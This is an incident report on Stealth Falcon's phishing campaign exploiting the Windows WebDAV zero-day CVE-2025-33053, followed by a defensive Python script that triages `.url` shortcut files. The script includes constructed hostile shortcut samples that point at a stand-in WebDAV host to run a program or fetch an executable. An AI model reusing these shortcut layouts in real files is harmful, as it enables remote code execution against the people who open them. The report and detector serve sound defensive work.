Full Report
Check Point attributed the attack to a group known as Stealth Falcon — a hacking group with longstanding ties to the UAE that has been implicated in dozens of spyware cases and hacking incidents involving governments across the Middle East and Africa.
Analysis Summary
# Incident Report: Windows Zero-Day Exploitation by Stealth Falcon via WebDAV Vulnerability
## Executive Summary
A Windows zero-day vulnerability (CVE-2025-33053) in the WebDAV component was exploited in attacks on government and defense targets in the Middle East and Africa. The activity, attributed to the APT group Stealth Falcon, used weaponized `.url` shortcut files delivered by phishing to achieve remote code execution. Check Point researchers discovered the exploitation while investigating an attempted intrusion against a Turkish defense organization; Microsoft subsequently released a patch.
## Incident Details
- **Discovery Date:** March, during Check Point's investigation of an attempted attack; publicly confirmed by Check Point's publication and Microsoft's June Patch Tuesday fix.
- **Incident Date:** In or before March, when the attack under investigation took place.
- **Affected Organization:** A major defense organization in Turkey (Initial sighting); other targets include governments in Qatar, Egypt, and Yemen.
- **Sector:** Government, Defense.
- **Geography:** Turkey (initial sighting); the broader campaign targeted the Middle East and Africa.
## Timeline of Events
### Initial Access
- **Date/Time:** Before March, when Check Point's investigation began.
- **Vector:** Spearphishing email delivering a disguised `.url` shortcut file.
- **Details:** The shortcut was disguised as a PDF document about military equipment damage. Opening it triggered CVE-2025-33053 and silently executed attacker-controlled code hosted on a remote server, without any further user interaction.
### Lateral Movement
- **Details:** Not explicitly detailed; the custom tools (Horus Agent and Horus Loader) indicate post-exploitation espionage activity, but no specific lateral movement technique is reported.
### Data Exfiltration/Impact
- **Details:** The campaign's objective was espionage, utilizing custom tools for stealthy operations.
### Detection & Response
- **Detection:** Discovered by Check Point researchers while investigating an attempted cyberattack on a Turkish defense organization.
- **Response:** Microsoft released a fix for CVE-2025-33053 in its June Patch Tuesday update. CISA added the vulnerability to its catalog of exploited vulnerabilities.
## Attack Methodology
- **Initial Access:** Exploitation of Windows WebDAV vulnerability (CVE-2025-33053) triggered by clicking a crafted URL file delivered via spearphishing.
- **Persistence:** Implied through the use of custom-built implants (Horus Agent/Loader).
- **Privilege Escalation:** Not explicitly detailed; the source describes only the initial remote code execution, not a separate escalation step.
- **Defense Evasion:** Use of custom-made tools (Horus Agent and Horus Loader) designed to avoid security tools.
- **Credential Access:** Not specified.
- **Discovery:** Not specified.
- **Lateral Movement:** Not described; the custom implants suggest post-exploitation activity, but no specific technique is reported.
- **Collection:** Espionage efforts using custom implants.
- **Exfiltration:** Implied based on espionage objectives.
- **Impact:** Compromise leading to espionage operations.
## Impact Assessment
- **Financial:** Not disclosed.
- **Data Breach:** Data related to espionage targets (governments/defense organizations) likely collected; specific volume/type not disclosed.
- **Operational:** Potential disruption to the targeted defense organization; because the vulnerability was exploited before a patch existed, affected organizations were exposed until the June update was applied.
- **Reputational:** Damage to affected organizations from the disclosure of espionage against them.
## Indicators of Compromise
- **Network indicators:** Attacker-controlled remote servers hosting the code fetched when the shortcut was opened; specific domains and IP addresses are not given in the source.
- **File indicators:** Weaponized `.url` files disguised as PDFs; custom malware named "Horus Agent" and "Horus Loader."
- **Behavioral indicators:** Silent remote code execution triggered by opening a `.url` shortcut; a shortcut that claims to be a PDF. The activity is consistent with well-resourced APT espionage operations.
## Response Actions
- **Containment measures:** Not specified; the key mitigation is deploying Microsoft's June patch for CVE-2025-33053.
- **Eradication steps:** Not specified, but would involve removing the custom implants (Horus Agent/Loader) from affected systems.
- **Recovery actions:** Not specified, but would involve scanning the environment for the implants and verifying that the patch is deployed.
## Lessons Learned
- **Key takeaways:** Well-resourced APTs like Stealth Falcon acquire and deploy zero-day exploits against high-value government and defense targets. Custom malware lets them evade signature-based defenses.
- **What could have been done better:** A zero-day offers no patch to apply in advance, so defenses cannot rest on patching alone. The delivery vector here, a `.url` shortcut disguised as a PDF and sent by email, is deceptively simple, and attachment filtering and user awareness could have blunted it.
## Recommendations
- **Prevention measures for similar incidents:** Apply security patches promptly, prioritizing vulnerabilities added to the CISA Known Exploited Vulnerabilities catalog. Enforce email security controls that detect and block suspicious attachment types (including `.url` shortcuts) and links. Strengthen endpoint detection and response (EDR) to catch behavior of novel custom malware such as Horus Agent/Loader rather than relying on signatures.
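As an added example (not code from Check Point, Microsoft, or the source report), the following Python script applies triage heuristics to `.url` attachments of the kind described in the indicators and recommendations above. The report does not disclose the contents of the campaign's shortcuts; the heuristics here (remote UNC/WebDAV paths in the `URL=`, `WorkingDirectory=` or `IconFile=` fields, and a document extension hidden in front of `.url`) are general indicators for the Windows Internet Shortcut format, and the sample files and the 203.0.113.10 address are constructed for the example.

```python
"""Triage heuristics for Windows Internet Shortcut (.url) files.

Added example for this report; not Check Point's or Microsoft's tooling and
not a description of the campaign's actual shortcut contents. It parses the
INI-style .url format and flags fields that reference remote WebDAV/UNC
locations or that disguise the shortcut as a document. All sample files
below are constructed for the example.
"""
import re
from typing import Dict, List

# UNC path, including the WebDAV mini-redirector forms \\host@80\ and \\host@SSL\
UNC_RE = re.compile(r"^\\\\[^\\/]+", re.IGNORECASE)
WEBDAV_HOST_RE = re.compile(r"^\\\\[^\\/]+@(?:ssl|\d+)", re.IGNORECASE)
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")


def parse_url_file(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [InternetShortcut] section, keys lower-cased.

    Written by hand rather than with configparser so that a BOM, duplicate keys
    or odd casing (all of which Windows tolerates) do not abort parsing.
    """
    fields: Dict[str, str] = {}
    in_section = False
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def is_remote(path: str) -> bool:
    """True for UNC/WebDAV paths and for file: URLs that resolve to a host, not a drive."""
    p = path.strip().strip('"')
    if p.lower().startswith("file:"):
        rest = p[5:].lstrip("/")          # file:///C:/x -> "C:/x"; file://host/x -> "host/x"
        return not re.match(r"^[a-z]:", rest, re.IGNORECASE)
    return bool(UNC_RE.match(p))


def triage(filename: str, text: str) -> List[str]:
    """Return a list of findings for one .url file (empty means nothing suspicious)."""
    fields = parse_url_file(text)
    findings: List[str] = []
    url = fields.get("url", "")
    lower_name = filename.lower()

    # Disguise: "report.pdf.url" is shown as "report.pdf" when extensions are hidden
    stem = lower_name[:-4] if lower_name.endswith(".url") else lower_name
    if stem.endswith(DOC_EXTS):
        findings.append(f"double extension disguises shortcut as document: {filename}")

    # The shortcut target itself lives on a remote share
    if is_remote(url):
        tag = "WebDAV" if WEBDAV_HOST_RE.match(url.strip('"')) else "UNC"
        findings.append(f"URL targets remote {tag} path: {url}")

    # A local program started with its working directory on a remote share:
    # anything the program resolves relative to its cwd then comes from that server.
    wd = fields.get("workingdirectory", "")
    if wd and is_remote(wd):
        findings.append(f"WorkingDirectory on remote share: {wd}")
        if url.lower().startswith("file:") and not is_remote(url):
            findings.append(f"local program {url} started with remote working directory")

    # A remote IconFile makes Explorer contact the server just to render the icon
    icon = fields.get("iconfile", "")
    if icon and is_remote(icon):
        findings.append(f"IconFile fetched from remote share: {icon}")

    return findings


# Constructed samples (not real campaign artifacts; 203.0.113.0/24 is a documentation range)
BENIGN = "[InternetShortcut]\r\nURL=https://example.com/handbook\r\n"

DISGUISED = (
    "\ufeff[InternetShortcut]\r\n"
    "URL=file:///C:/Windows/System32/calc.exe\r\n"
    "WorkingDirectory=\\\\203.0.113.10@80\\DavWWWRoot\\docs\r\n"
    "IconFile=C:\\Windows\\System32\\shell32.dll\r\n"
    "IconIndex=1\r\n"
)

WEBDAV_TARGET = (
    "[InternetShortcut]\r\n"
    "URL=\\\\203.0.113.10@SSL@443\\DavWWWRoot\\damage_report.exe\r\n"
)

if __name__ == "__main__":
    for name, body in [("handbook.url", BENIGN),
                       ("Damage_Report.pdf.url", DISGUISED),
                       ("report.url", WEBDAV_TARGET)]:
        hits = triage(name, body)
        print(name, "->", hits or "clean")
```

On a mail gateway or in an EDR content rule this would complement, not replace, blocking `.url` attachments outright; its value is in triage of files that slip through and in hunting across user Downloads folders. The point the `WorkingDirectory` check makes is that a shortcut whose target is a local, trusted program can still be dangerous when its working directory is an attacker's WebDAV share.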